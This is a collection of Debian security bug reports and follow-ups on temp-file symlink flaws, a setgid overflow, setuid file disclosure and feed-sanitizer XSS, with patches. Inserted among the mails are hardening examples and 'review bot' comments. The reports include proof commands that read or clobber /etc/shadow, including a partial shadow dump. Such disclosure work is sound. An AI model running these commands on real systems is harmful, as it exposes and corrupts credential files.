Bug#809252: node-cli: insecure use of temporary files

2015-12-28 Thread Steve Kemp

Package: node-cli
Version: 0.4.4~20120516-1
Severity: critical
Tags: security

Dear Maintainer,

The `node-cli` library makes insecure use of the following two
temporary files:

lock_file = '/tmp/' + cli.app + '.pid',
log_file = '/tmp/' + cli.app + '.log';

These allow overwriting files that the starting user has permission
to modify.



-- System Information:
Debian Release: 8.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)



Bug#808730: stalin: Insecure use of temporary files

2015-12-22 Thread Steve Kemp

Package: stalin
Version: 0.11-5
Severity: critical
Tags: security


When `stalin` launches it attempts to detect its environment via
the following code in /usr/lib/stalin/QobiScheme.sc:

   
(system "uname -m >/tmp/QobiScheme.tmp")
...
(system "rm -f /tmp/QobiScheme.tmp"))

This is a prime example of the insecure use of temporary files,
and allows overwriting any file owned by the user who invokes
stalin.

Trivial demonstration:


$ ln -s /home/steve/HACK /tmp/QobiScheme.tmp
$ ls -l /home/steve/HACK
ls: cannot access /home/steve/HACK: No such file or directory

Now run the sample code:


$ cd /tmp/stalin-0.11/benchmarks
$ ./make-hello

And we see this:

$ ls -l /home/steve/HACK
-rw-r--r-- 1 steve steve 6 Dec 22 08:30 /home/steve/HACK



-- System Information:
Debian Release: 8.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages stalin depends on:
ii  dpkg-dev   1.17.26
ii  libc6  2.19-18+deb8u1
ii  libgc-dev  1:7.2d-6.4

stalin recommends no packages.

stalin suggests no packages.

-- no debconf information


Steve
-- 
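The node-cli and stalin reports above share one root cause: a fixed, guessable name under /tmp is opened for writing, so whoever pre-creates that name as a symlink chooses which file the program clobbers. The following is an added example, not code from either package: the vulnerable open beside two hardened forms, written in Python 3 so the open(2) flags are visible. It replays the symlink attack inside a scratch directory that stands in for /tmp (an assumption of the example) and reports what each variant did.

```python
import os
import shutil
import stat
import tempfile

# Every path below lives in a throwaway directory standing in for /tmp,
# so the demo never touches the real /tmp (assumption of this example).


def plant_symlink(tmpdir, name, victim):
    """The attacker's move from the report: pre-create the predictable
    name as a symlink pointing at the file they want clobbered."""
    os.symlink(victim, os.path.join(tmpdir, name))


def vulnerable_write(tmpdir, name, data):
    """The stalin / node-cli pattern: a fixed name under /tmp opened for
    writing.  open(2) follows the planted symlink, so the victim file is
    created or truncated and filled with our data."""
    with open(os.path.join(tmpdir, name), "w") as fh:
        fh.write(data)


def hardened_write(tmpdir, name, data):
    """Same fixed name, but O_CREAT|O_EXCL makes open(2) fail if anything
    already exists at the path (a symlink included, wherever it points)
    and O_NOFOLLOW refuses a symlink in the final component.  Returns
    True if the file was created, False if the name was already taken."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    try:
        fd = os.open(os.path.join(tmpdir, name), flags, 0o600)
    except FileExistsError:
        return False
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return True


def unpredictable_write(tmpdir, data):
    """The preferred fix when the name need not be shared with anyone:
    let mkstemp pick a random name and create it with O_EXCL, mode 0600."""
    fd, path = tempfile.mkstemp(prefix="QobiScheme.", dir=tmpdir)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return path


def demo():
    """Run the attack against each writer and report what happened."""
    tmpdir = tempfile.mkdtemp()
    try:
        victim = os.path.join(tmpdir, "HACK")   # stands in for /home/steve/HACK
        plant_symlink(tmpdir, "QobiScheme.tmp", victim)

        vulnerable_write(tmpdir, "QobiScheme.tmp", "x86_64\n")
        vulnerable_hit = os.path.exists(victim)

        os.unlink(victim)                         # reset; the symlink now dangles
        hardened_refused = not hardened_write(tmpdir, "QobiScheme.tmp", "x86_64\n")
        hardened_victim_untouched = not os.path.exists(victim)

        path = unpredictable_write(tmpdir, "x86_64\n")
        mode = stat.S_IMODE(os.stat(path).st_mode)
        return {
            "vulnerable_overwrote_victim": vulnerable_hit,
            "hardened_refused_symlink": hardened_refused,
            "hardened_victim_untouched": hardened_victim_untouched,
            "mkstemp_mode_is_0600": mode == 0o600,
        }
    finally:
        shutil.rmtree(tmpdir)


if __name__ == "__main__":
    for check, result in demo().items():
        print(check, result)
```

O_EXCL refuses the planted link even though it dangles, because the kernel fails O_CREAT|O_EXCL on any symlink regardless of where it points. A current Linux kernel with fs.protected_symlinks=1 would already block the cross-user version of the stalin demonstration in the real /tmp (sticky, world-writable directory, link owned by someone other than the follower); the scratch directory here is private, so the flaw shows through. The same pattern recurs in the winkeydaemon, xwine and xen reports further down the page.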



Bug#730189: ruby1.8: CVE-2013-4164

2013-11-28 Thread Steve Kemp
  The patches seem to work successfully for me:

  * The test-suite that runs at compile-time still passes.
 
  * The reproducer stops segfaulting.

  The reproducer I'm using is:

--
#!/usr/bin/ruby1.8
require 'json'
JSON.parse("[1."+"1"*30+"]")
--

Steve
-- 
http://www.steve.org.uk/


Bug#651896: Acknowledgement (njam: Insecure usage of environmental variable)

2011-12-13 Thread Steve Kemp

  Simple patch:

--- src/njam.cpp-orig   2011-12-13 17:06:04.0 +
+++ src/njam.cpp2011-12-13 17:07:08.0 +
@@ -339,7 +339,7 @@
sprintf(linux_sdl_driver, "x11\0");
char *driver_name = getenv("SDL_VIDEODRIVER");
if (driver_name)
-   sprintf(linux_sdl_driver, "%s\0", driver_name);
+   snprintf(linux_sdl_driver, sizeof(linux_sdl_driver)-1, "%s", 
driver_name);
 
if (UseDGA)
{
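Review bot: the replacement `snprintf(linux_sdl_driver, sizeof(linux_sdl_driver)-1, "%s", driver_name)` only bounds the copy if `linux_sdl_driver` is declared as a fixed-size array; if it is a `char *`, `sizeof` yields the pointer size and the overflow merely shrinks. Check the declaration, and drop the `-1`: `snprintf` already reserves room for the terminating NUL within the size it is given, so `sizeof(linux_sdl_driver)` is the correct bound. The unchanged `sprintf(linux_sdl_driver, "x11\0")` on the context line above keeps a pointless embedded `\0` (the literal already ends in one) and could use the same `snprintf` form for consistency. Consider checking the return value too: an over-long value is now silently truncated rather than rejected, which is safe but hands SDL a mangled driver name.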



Steve
-- 
http://edinburgh-portraits.com/



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org



Bug#651896: njam: Insecure usage of environmental variable

2011-12-12 Thread Steve Kemp

Package: njam
Version: 1.25-5
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The setgid(games) binary /usr/games/njam makes insecure use of the 
environmental variable SDL_VIDEODRIVER.

This potentially allows the execution of arbitrary code, as the
following example shows:

1.  Setup the variable:

birthday:~# export SDL_VIDEODRIVER=$(perl -e "print 'x'x300") 


2.  Launch the binary under gdb so we can see what happens:

birthday:~# gdb /usr/games/njam
(gdb) run
Starting program: /usr/games/njam 
..
Program received signal SIGSEGV, Segmentation fault.
0x00404f48 in ?? ()
(gdb) bt
0  0x00404f48 in ?? ()
1  0x7878787878787878 in ?? ()
2  0x7878787878787878 in ?? ()
3  0x7878787878787878 in ?? ()

  0x78 == "x" == Code execution via overflow.


  This is probably a minor issue, but should be simple to patch.

-- System Information:
Debian Release: 6.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/3 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages njam depends on:
ii  libc6            2.11.2-10    Embedded GNU C Library: Shared lib
ii  libgcc1          1:4.4.5-8    GCC support library
ii  libsdl-image1.2  1.2.10-2+b2  image loading library for Simple D
ii  libsdl-mixer1.2  1.2.8-6.3    mixer library for Simple DirectMed
ii  libsdl-net1.2    1.2.7-2      network library for Simple DirectM
ii  libsdl1.2debian  1.2.14-6.1   Simple DirectMedia Layer
ii  libstdc++6       4.4.5-8      The GNU Standard C++ Library v3

njam recommends no packages.

njam suggests no packages.

-- no debconf information







Bug#553948: winkeydaemon: Symlink attack allows creation of arbitrary files

2009-11-02 Thread Steve Kemp
Package: winkeydaemon
Version: 1.0.1-3
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

  This is probably not a hugely exploitable issue, but reporting
 regardless:

 winkeydaemon.pl:

if (-d "/tmp/.winkey") {
# ok, no action required
} else {
my $dir = "/tmp/.winkey";
`mkdir "$dir"`;
if ($debug) {print "Arranging mutex directory\n";}
}
...
...
`touch /tmp/.winkey/keyer_busy`;
...
`rm /tmp/.winkey/keyer_busy`;
...


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages winkeydaemon depends on:
ii  libdevice-serialport-perl 1.04-2+b1  emulation of Win32::SerialPort for

winkeydaemon recommends no packages.

winkeydaemon suggests no packages.






Bug#548684: oping allows reading arbitrary files upon the local system - security issue

2009-09-27 Thread Steve Kemp

Package: oping
Version: 1.3.2-1
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

 oping is setuid root and one of the command line arguments allows
 a configuration file to be specified.  This file is read and *reported*
 to the console.  (Unless the file contains contents which can be
 interpreted as a list of hostnames!)

 For example:

 s...@gold:~$ oping  -f /etc/shadow
 Adding host `root:$1eluded/value:14368:0:9:7:::' failed: getaddrinfo: Name or service not known
 Adding host `daemon:*:13876:0:9:7:::' failed: getaddrinfo: Name or service not known
 Adding host `bin:*:13876:0:9:7:::' failed: getaddrinfo: Name or service not known
 Adding host `sys:*:13876:0:9:7:::' failed: getaddrinfo: Name or service not known
 Adding host `sync:*:13876:0:9:7:::' failed: getaddrinfo: Name or service not known
 Adding host `games:*:13876:0:9:7:::' failed: getaddrinfo: Name or service not known

  This is clearly a security hole - however the good news is that the
 version(s) of oping included in lenny and etch are unaffected.

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages oping depends on:
ii  libc6      2.9-26   GNU C Library: Shared libraries
ii  liboping0  1.3.2-1  C/C++ library to generate ICMP ECH

oping recommends no packages.

oping suggests no packages.

-- no debconf information






Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds

2009-09-18 Thread Steve Kemp
On Fri Sep 18, 2009 at 14:06:44 +0200, Arnaud Fontaine wrote:

> No I didn't, I could not find this discussion, could you please point it
> me out?   As soon as all these  issues will have been  addressed, I will
> prepare  a  package (debian-security  team:  please  do  not upload  the
> package for now).

 Basically it comes down to CDATA and the handling of 

 This is the comment I received:

--
 please find attached the two reproducers for the CDATA thing. poc1.xml
 is not correctly filtered while poc2.xml is filtered, although they are
 nearly identical.

 If you edit the newly patched function to print the k and v values,
 you'll see that the attributes aren't passed through.
--

Steve
--


poc1.xml
Description: XML document


poc2.xml
Description: XML document


Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds

2009-09-18 Thread Steve Kemp
On Fri Sep 18, 2009 at 13:38:39 +0200, Arnaud Fontaine wrote:

> I have prepared  yesterday a package for Lenny  including this patch. At
> the moment, I'm waiting for a reply from the debian-security team.

  Great.  Don't forget etch too.

> Thank you very much for the patch and bug report.

  Did you see the followup discussion from Secunia about another
 planet-problem, relating to the handling of CDATA ?

  (To be honest if I were to re-do the patch now I'd probably
 do it the other way round: make sure "src" starts with http:
 to cover other cases too.)

Steve
--







Bug#546178: Updated patch

2009-09-15 Thread Steve Kemp
  The patch doesn't account for case variations, so it should be updated:

+
+for i in xrange (len (attrs)):
+k,v = attrs[i]
+if (( k == "src" ) or ( k == "href" ) ) and 
(v.lower().find("javascript:" ) <> -1 ):
+del attrs[i]
+
 return attrs
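Review bot: `del attrs[i]` inside `for i in xrange(len(attrs))` mutates the list being indexed: each deletion shifts the remaining pairs down, so the attribute that followed a removed one is never examined, and once the list has shrunk `attrs[i]` raises `IndexError` for the trailing indices. Rebuild the list instead, e.g. `attrs = [(k, v) for k, v in attrs if not (k in ("src", "href") and v.lower().find("javascript:") != -1)]`. The substring test is also narrower than it looks: `vbscript:` and `data:` pass, and a scheme split by whitespace or entity-encoded characters is not matched; an allow-list of schemes on the parsed value is the robust form.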

Steve
--
http://www.steve.org.uk/






Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds

2009-09-11 Thread Steve Kemp
Subject: planet: [CVE-2009-2937] - Insufficient escaping of input feeds
Package: planet
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The planet feed aggregator attempts to remove malicious content from
user-submitted feeds.  It does a great job, but fails to sanitize
this input:

  

At least Opera will execute this code.

The packages in Etch and Lenny are vulnerable and should require a
security update.  Fixed packages are available from:

 http://www.steve.org.uk/tmp/planet/etch/
+
 http://www.steve.org.uk/tmp/planet/lenny/

This is the patch I used:

--- planet-2.0.orig/planet/sanitize.py
+++ planet-2.0/planet/sanitize.py
@@ -70,6 +70,12 @@
 # utility method to be called by descendants
 attrs = [(k.lower(), v) for k, v in attrs]
 attrs = [(k, k in ('rel', 'type') and v.lower() or v) for k, v in 
attrs]
+
+for i in xrange (len (attrs)):
+k,v = attrs[i]
+if (( k == "src" ) or ( k == "href" ) ) and (v.find("javascript:" 
) <> -1 ):
+del attrs[i]
+
 return attrs

 def unknown_starttag(self, tag, attrs):
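Review bot: `v.find("javascript:")` is case-sensitive, so `JavaScript:` or `JAVASCRIPT:` in an `href` passes through untouched; compare against `v.lower()`, or better, parse the scheme and allow only `http`, `https` and relative values. Separately, deleting `attrs[i]` while iterating `xrange(len(attrs))` skips the element after each deletion and raises `IndexError` once the list has shrunk; build a filtered list with a comprehension instead of deleting in place.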


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash







Bug#546179: planet-venus: [CVE-2009-2937] - Insufficient escaping of input feeds

2009-09-11 Thread Steve Kemp
Subject: planet-venus: [CVE-2009-2937] - Insufficient escaping of input feeds
Package: planet-venus
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The planet feed aggregator attempts to remove malicious content from
user-submitted feeds.  It does a great job, but fails to sanitize
this input:

  

At least Opera will execute this code.

The package in Lenny is vulnerable and should require a
security update.  Fixed packages are available from:

 http://www.steve.org.uk/tmp/planet/lenny/

This is the patch I used, written by upstream:

s...@senfl:~$ diff --unified scrub.orig scrub.py
--- scrub.orig  2009-09-09 16:24:50.0 +
+++ scrub.py2009-09-09 16:25:18.0 +
@@ -128,5 +128,13 @@
 node['value'] = feedparser._resolveRelativeURIs(
 node.value, node.base, 'utf-8', node.type)

-node['value'] = feedparser._sanitizeHTML(
-node.value, 'utf-8', node.type)
+# Run this through HTML5's serializer
+from html5lib import html5parser, sanitizer, treebuilders
+from html5lib import treewalkers, serializer
+p = html5parser.HTMLParser(tokenizer=sanitizer.HTMLSanitizer,
+  tree=treebuilders.getTreeBuilder('dom'))
+doc = p.parseFragment(node.value, encoding='utf-8')
+xhtml = serializer.XHTMLSerializer(inject_meta_charset = False)
+walker = treewalkers.getTreeWalker('dom')
+tree = xhtml.serialize(walker(doc), encoding='utf-8')
+node['value'] = ''.join([str(token) for token in tree])
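Review bot: the removed call passed `node.type` to `_sanitizeHTML`, but the replacement parses every value with `p.parseFragment(node.value, encoding='utf-8')` regardless of type and always serializes through `XHTMLSerializer`, so a node that was `text/html` (or plain text) comes back as XHTML markup with `node['type']` still claiming the old type; either branch on `node.type` or set it after serializing. The `from html5lib import ...` statements also run on every call and introduce a new runtime dependency on the html5lib package that the Debian package must now declare; hoisting the imports to module level makes a missing dependency fail at import time rather than on the first feed.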


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
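Both planet reports above boil down to a URL attribute whose scheme the sanitizer never examined; the reply earlier in this thread suggests turning the fix round and accepting only values that start with http:. What follows is an added example, not code from planet, planet-venus or either patch: a scheme allow-list filter in Python 3 that applies the normalisations a browser performs before it looks at the scheme, plus a replacement for the attribute loop that builds a new list instead of deleting from the one being iterated. SAFE_SCHEMES and URL_ATTRS are this example's assumptions.

```python
import html
import re

# Schemes a feed aggregator has a reason to pass through (assumption of
# this example; add mailto:, ftp: and so on as policy dictates).
SAFE_SCHEMES = {"http", "https"}

# Attribute names whose value the browser will fetch or navigate to.
URL_ATTRS = {"src", "href", "action", "background", "cite", "longdesc"}

# Browsers drop tab, newline, carriage return and other C0 controls while
# parsing a URL and trim surrounding spaces, so "java\tscript:" still
# runs.  Strip the same characters before looking at the scheme.
_CONTROL = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):", re.I)


def url_is_safe(value):
    """Allow-list decision on the scheme of an attribute value: relative
    URLs and the listed schemes pass; javascript:, vbscript:, data: and
    anything else are rejected however they are spelled or encoded."""
    cleaned = _CONTROL.sub("", html.unescape(value))
    m = _SCHEME.match(cleaned)
    if m is None:            # no scheme at all: a relative URL
        return True
    return m.group(1).lower() in SAFE_SCHEMES


def filter_attrs(attrs):
    """Drop-in for the loop in planet's sanitize.py: takes the list of
    (name, value) pairs and returns a new list with unsafe URL-bearing
    attributes removed.  Returning a fresh list avoids the skipped-element
    and IndexError problems of deleting from the list being iterated."""
    return [(k, v) for k, v in attrs
            if not (k.lower() in URL_ATTRS and not url_is_safe(v))]


if __name__ == "__main__":
    # Constructed sample attributes, in the shape sgmllib hands them over.
    sample = [("src", "JaVaScRiPt:alert(1)"),
              ("SRC", "java\tscript:alert(1)"),
              ("href", "&#106;avascript:alert(1)"),
              ("href", "https://example.org/"),
              ("alt", "javascript: in alt text is harmless")]
    print(filter_attrs(sample))
```

The point of the allow-list is that every bypass in the deny-list world (mixed case, embedded tabs, entity-encoded letters, a scheme nobody listed) ends up on the reject side by default. Entity decoding is applied only to the copy used for the decision; the value that is kept is passed through unchanged.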







Bug#518122: Acknowledgement (Security issue in mantis)

2009-03-04 Thread Steve Kemp
  Looks like I filed this too soon - the bug is fixed in Lenny's
 package already.

Steve
-- 






Bug#518122: Security issue in mantis

2009-03-04 Thread Steve Kemp
Package: mantis
Severity: grave
Tags: security
Version: 1.1.6+dfsg-2

  There's a security issue in the mantis version in lenny, at least,
 which allows registered users to run commands on the server.

  Details here:

http://secunia.com/advisories/32314/

  Patch here:


http://mantisbt.svn.sourceforge.net/viewvc/mantisbt/branches/BRANCH_1_1_0/mantisbt/core/utility_api.php?r1=5679&r2=5678&pathrev=5679

Steve
-- 
Stop blog&forum spam
http://blogspam.net/






Bug#509288: gnomad2: segfault on start up / vorbis comment headers

2008-12-22 Thread Steve Kemp
  The patch below my sig is sufficient to fix the bug.

  See here for more details:

http://blog.steve.org.uk/what_can_you_do__sparta_will_need_sons_.html

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/

s...@gold:/tmp$ diff --unified --ignore-space-change 
gnomad2-2.9.1/src/tagfile.c gnomad2-2.9.1.orig/src/tagfile.c
--- gnomad2-2.9.1/src/tagfile.c 2007-10-17 19:47:39.0 +0100
+++ gnomad2-2.9.1.orig/src/tagfile.c2008-12-22 22:25:18.0 +
@@ -59,9 +59,15 @@
 g_free(tmppath);
 return;  
   }
-  g_free(tmppath);
   
   tag = taglib_file_tag(file);
+  if ( tag == NULL ) {
+g_printf("tags were null in file %s", tmppath);
+g_free(tmppath);
+return;
+  }
+  g_free(tmppath);
+
   properties = taglib_file_audioproperties(file);
   
   gchar* artist = taglib_tag_artist(tag);
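Review bot: the diff names `gnomad2-2.9.1/src/tagfile.c` as the `---` side and `gnomad2-2.9.1.orig/src/tagfile.c` as `+++`, so the NULL check reads as an addition to the `.orig` tree; whoever applies it should confirm the direction (`patch -R` if the trees really are what their names suggest). Within the new block, the `g_printf("tags were null in file %s", tmppath)` message has no trailing newline, and the early return a few lines above it frees `tmppath` before returning; mirror that path exactly, including whatever cleanup of `file` it performs, so the NULL-tag exit does not leak.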







Bug#494648: The possibility of attack with the help of symlinks in some Debian packages

2008-08-13 Thread Steve Kemp
On Wed Aug 13, 2008 at 22:51:00 +1000, Sven Dowideit wrote:

> no, its got nothing to do with /var/lib/twiki/data etc, its the location
> for session data - produced by CGI::Session etc.

  Yes it does.
  
  The code we're talking about is contained in the file debian/postinst,
 and only executes under the following condition:

 # create initial htpasswd, if needed
 if [ -e /var/lib/twiki/data ]; then

...
...
#create securer-twiki session dir
mkdir ...

 fi

  My understanding of the discussion thus far is:

a.  This is a genuine bug.
b.  Which has been fixed.
c.  Except in Etch.

Steve
-- 






Bug#494648: The possibility of attack with the help of symlinks in some Debian packages

2008-08-13 Thread Steve Kemp
On Wed Aug 13, 2008 at 11:31:54 +1000, Sven Dowideit wrote:

> I will have to assume that this report is indeed incorrect unless I hear
> otherwise.

  On my Debian Etch system:

[EMAIL PROTECTED]:~$ apt-get source twiki
Reading package lists... Done
Building dependency tree... Done
Need to get 4304kB of source archives.
Get: 1 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (dsc) [639B]
Get: 2 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (tar) [4264kB]
Get: 3 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (diff) [39.3kB]
Fetched 4304kB in 7s (546kB/s)
gpg: Signature made Wed 21 Feb 2007 06:51:24 GMT using DSA key ID C0143D2D
gpg: Can't check signature: public key not found
dpkg-source: extracting twiki in twiki-4.0.5
dpkg-source: unpacking twiki_4.0.5.orig.tar.gz
dpkg-source: applying ./twiki_4.0.5-9.1.diff.gz

[EMAIL PROTECTED]:~$ cd twiki-4.0.5/
[EMAIL PROTECTED]:~/twiki-4.0.5$ grep /tmp/twiki debian/postinst
if [ ! -e /tmp/twiki ]; then
mkdir /tmp/twiki
chmod 777 /tmp/twiki
chown $TWIKI_OWNER.www-data /tmp/twiki
[EMAIL PROTECTED]:~/twiki-4.0.5$


  So :

1.  If /tmp/twiki doesn't exist it is made as a directory.

2.  If it does exist its permissions are changed - unconditionally

  Let me exploit it:

[EMAIL PROTECTED]:~$
[EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki
[EMAIL PROTECTED]:~$ sudo apt-get install twiki
Password:
Reading package lists... Done
Building dependency tree... Done
The following extra packages will be installed:
  libalgorithm-diff-perl liblocale-maketext-lexicon-perl libtext-diff-perl rcs
Suggested packages:
...
...
Setting up libtext-diff-perl (0.35-2) ...
Setting up rcs (5.7-18) ...
Setting up twiki (4.0.5-9.1) ...
Adding password for user TWikiGuest
Reloading web server config...3224

   Now what happened?

   Nothing.  The directory /tmp/twiki was created and my symlink wasn't
 touched.  So we look safe.  But I'm not convinced.

   I know that I can coerce it into working:

[EMAIL PROTECTED]:~$ sudo rm -rf /tmp/twiki
[EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki
[EMAIL PROTECTED]:~$ sudo /var/lib/dpkg/info/twiki.postinst configure
Reloading web server config...3224
.
[EMAIL PROTECTED]:~$ ls -l /etc/shadow
-rwxrwxrwx 1 www-data www-data 1093 2008-08-13 10:35 /etc/shadow

  I guess the difference is relating to the presence, or not, of 
 /var/lib/twiki/data ?

  Looks like merely installing the package wouldn't trigger this,
 but an upgrade might.  Or something like that !

Steve
--  







Bug#489756: poppler CVE-2008-2950 in etch

2008-07-09 Thread Steve Kemp
On Wed Jul 09, 2008 at 12:04:01 +0200, Wichert Akkerman wrote:
> I see CVE-2008-2960 reported in the BTS as #489756 but I see no mention  
> of a fix for stable. Is someone working on a DSA for stable?

  There isn't one in progress.  Tonight there will be a release of
 an update to handle CVE-2008-1693.  I guess that will be the next
 one.

Steve
-- 







Bug#480059: vorbis-tools vulnerable to CVE-2008-1686

2008-05-08 Thread Steve Kemp
On Wed May 07, 2008 at 18:12:09 -0400, Jamie Strandboge wrote:

> vorbis-tools contains embedded speex code, and although vorbis-tools is linked
> to libspeex, it compiles the vulnerable code. Attached is a debdiff that Ubuntu
> is using in its 1.1.1 versions of vorbis-tools (fuzz removed).

  I'd rather see a patch that makes the vorbis-tools link
 against the system-wide library, and not compile the vulnerable
 code at all.

  Would it be possible for you to provide such a thing, or is that
 too hard?

Steve
-- 






Bug#464756: kazehakase security fix patch

2008-04-17 Thread Steve Kemp
On Tue Apr 15, 2008 at 21:36:13 -0400, Andres Salomon wrote:

> > Cool.  The package is here:
> > 
> > http://people.debian.org/~dilinger/security/kazehakase/etch/
> > 
> > I will give it a bit more testing later on tonight.

  Thanks.  I'll upload this tomorrow.  I assume this will
 be handled in the same way for Lenny / Sid?

Steve
-- 






Bug#464756: kazehakase security fix patch

2008-04-15 Thread Steve Kemp
On Tue Apr 15, 2008 at 15:46:02 -0400, Andres Salomon wrote:

> I'd rather see kaz linked against the system's pcre;
> it's much easier to deal w/.  Does the security team agree?

  Definitely!

Steve
-- 







Bug#475747: tss: Allows reading arbitrary files

2008-04-12 Thread Steve Kemp
Package: tss
Version: 0.8.1-3
Severity: grave
Justification: user security hole
Tags: security

*** Please type your report below this line ***

  Due to poor permission checking the tss binary allows local
 users to read arbitrary files upon the system.

  For example the following reveals the contents of the
 /etc/shadow file:

[EMAIL PROTECTED]:~$ tss -a /etc/shadow

  The code *should* drop privileges prior to opening
 any files, or failing that should stat() the file to ensure
 the caller may view it.


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.18-4-xen-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages tss depends on:
ii  libc6 2.7-10 GNU C Library: Shared libraries
ii  libncurses5   5.6+20080405-1 Shared libraries for terminal hand

tss recommends no packages.

-- no debconf information

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/
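The oping report above and this tss report describe the same mistake in a setuid-root binary: a path supplied on the command line is opened with root's permissions and its contents are echoed back to the invoking user. The following is an added example in Python 3, not code from oping or tss: the two checks a setuid program can make before opening a user-supplied file, the quick access(2) test and the temporary drop of effective ids around the open, run against two files the example constructs itself, one world-readable and one with mode 0.

```python
import os
import shutil
import tempfile


def running_as_root():
    """Lets callers know when mode-0 files are readable anyway."""
    return os.geteuid() == 0


def invoking_user_may_read(path):
    """Quick check with access(2), which evaluates the *real* uid/gid,
    i.e. the user who ran the setuid binary rather than root.  Cheap, but
    racy: the file can be swapped between this check and the open, so it
    is a guard, not the fix."""
    return os.access(path, os.R_OK)


def read_as_invoking_user(path):
    """The fix: lower the effective ids to the invoking user around the
    open, so the kernel applies that user's permissions.  The saved
    set-user-ID keeps root recoverable for work that genuinely needs it.
    In a non-setuid process the ids are already equal and these calls are
    no-ops, which is what lets the demo run as a plain user.  Returns the
    file contents, or None if the invoking user may not read it."""
    ruid, euid = os.getuid(), os.geteuid()
    rgid, egid = os.getgid(), os.getegid()
    os.setegid(rgid)          # group first: once euid is non-root we could not
    os.seteuid(ruid)
    try:
        with open(path) as fh:
            return fh.read()
    except PermissionError:
        return None
    finally:
        os.seteuid(euid)      # restore root first, then the group
        os.setegid(egid)


def demo():
    """Build a readable host list and a mode-0 'shadow' file (both
    constructed here), then try each through both checks."""
    tmpdir = tempfile.mkdtemp()
    try:
        hosts = os.path.join(tmpdir, "hosts")
        with open(hosts, "w") as fh:
            fh.write("localhost\n")
        shadow = os.path.join(tmpdir, "shadow")
        with open(shadow, "w") as fh:
            fh.write("root:$1$eluded:14368:0:99999:7:::\n")
        os.chmod(shadow, 0)   # readable by nobody but root
        return {
            "hosts_access": invoking_user_may_read(hosts),
            "hosts_read": read_as_invoking_user(hosts),
            "shadow_access": invoking_user_may_read(shadow),
            "shadow_read": read_as_invoking_user(shadow),
        }
    finally:
        shutil.rmtree(tmpdir)


if __name__ == "__main__":
    print(demo())
```

Of the two, the privilege drop is the one to rely on: access(2) answers for the path at the moment it is asked, and the file behind it can be replaced before the open. When elevated privilege is needed only at start-up, as for the raw ICMP socket a ping tool opens, the better shape still is to acquire that resource first and then drop permanently with setresuid(ruid, ruid, ruid), after which no later file access can be steered into root's view.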







Bug#468050: Security problems present in xwine

2008-02-26 Thread Steve Kemp
Package: xwine
Version: 1.0.1-1.1
